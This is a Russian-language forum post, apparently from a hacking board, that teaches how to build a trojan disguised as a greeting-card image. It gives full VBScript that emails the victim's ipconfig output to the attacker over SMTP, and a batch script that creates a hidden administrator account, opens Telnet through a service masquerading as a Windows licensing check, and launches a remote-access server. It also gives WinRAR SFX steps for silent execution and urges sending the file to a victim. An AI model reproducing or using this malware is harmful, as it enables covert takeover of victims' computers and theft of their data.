Троян не палился не одним из 40 антивирусов.
Сейчас я покажу как написать трояна который будет открывать 23[telnet] и 28137[FTP] порт , будет один файл *.exe , юзер откроет его , а там откроется картинка , не каких лишних окон выходить не будет .
Для начала скачиваем прогу Yoozy
Для создания трояна нужны файлы :
1)YoozyServer.exe - находится в архиве
2)любая картинка с названием 123.jpg
3)mail.vbs - этот файл присылает ip на мыло
4)user.bat - нужно создать ярлык этого файла
Исходник mail.vbs
Quote
Const FOF_SIMPLEPROGRESS = 256
Dim MySource, MyTarget, MyHex, MyBinary, i
Dim oShell, oCTF
Dim oFileSys
dim winShell
dim newfolderpath
dim t
On Error Resume Next
h = Hour(Now)
m = Minute(Now)
s = Second(Now)
t = date() & "-" & h & "-" & m & "-" & s
dim filesys, newfolder
newfolderpath = "c:\12345" ' Название временной папки
set filesys=CreateObject("sсriрting.FileSystemObject")
If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If
set filesys=Nothing
Set newfolder=Nothing
Set WshShell = CreateObject("Wsсriрt.Shell")
WshShell.Run "cmd.exe /c ipconfig > C:\12345\ip.txt", 0, false
Wsсriрt.Sleep (5000)
Set S = CreateObject("Wsсriрt.Shell")
set FSO=createobject("sсriрting.filesystemobject")
Call SendPost("smtp.mail.ru","куда придёт айпи","левое мыло с @mail.ru","IP ЛАМЕРА","ИПЫ")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,s trbоdу)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="здесь логин левого мыла без @mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="здесь пароль от левого мыла"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.updаtе
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.Textbоdу=strbоdу
iMsg.AddAttachment "C:\12345\ip.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing
Исходник user.bat
Code
@Echo off
start C:\mail.vbs
start C:\123.jpg
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 1 /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc desсriрtion "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
sc config tlntsvr start= auto
tlntadmn config port=23 sec=-NTLM
net start Telnet
start C:\YoozyServer.exe
Этот код создаст юзера с логином : SUPPORT_388945a0 и паролем : 1 , для подключения через 23 порт , юзер будет скрыт и не будет отображатся .
Скрины :
Все 4 файла
Создание ярлыка user.bat
Winrar
Настройки в winrar'e , нужно выделить всё и щёлкнуть правой кнопкой мыши , и выбрать "Добавить в архив", дадим название файлу Окрытка.exe
После нажимаем "Дополнительно" "Параметры SFX"
После нажимаем на вкладку "Режимы" и ставим галочку на "скрыть всё"
Нажимаем на вкладку "текст и графика" там есть функция "Загрузить значок SFX из файла" скачиваем с инета иконки указываем пуь , после нажимаем "ок" "ок" и у нас должен получится один файл "Открытка.exe"
Пример:
Далее закидываем жертве и ждём ip , после того как ip пришёл Открываем Yoozy.exe (не вздумайте открыть YoozyServer.exe) вводим ip и мы имеем полный доступ к файлам , а чтоб подключится через telnet , заходим Пуск-Выполнить- telnet.exe или зажимаем клавиши windows+r .
Если помог не забываем поблагодарить
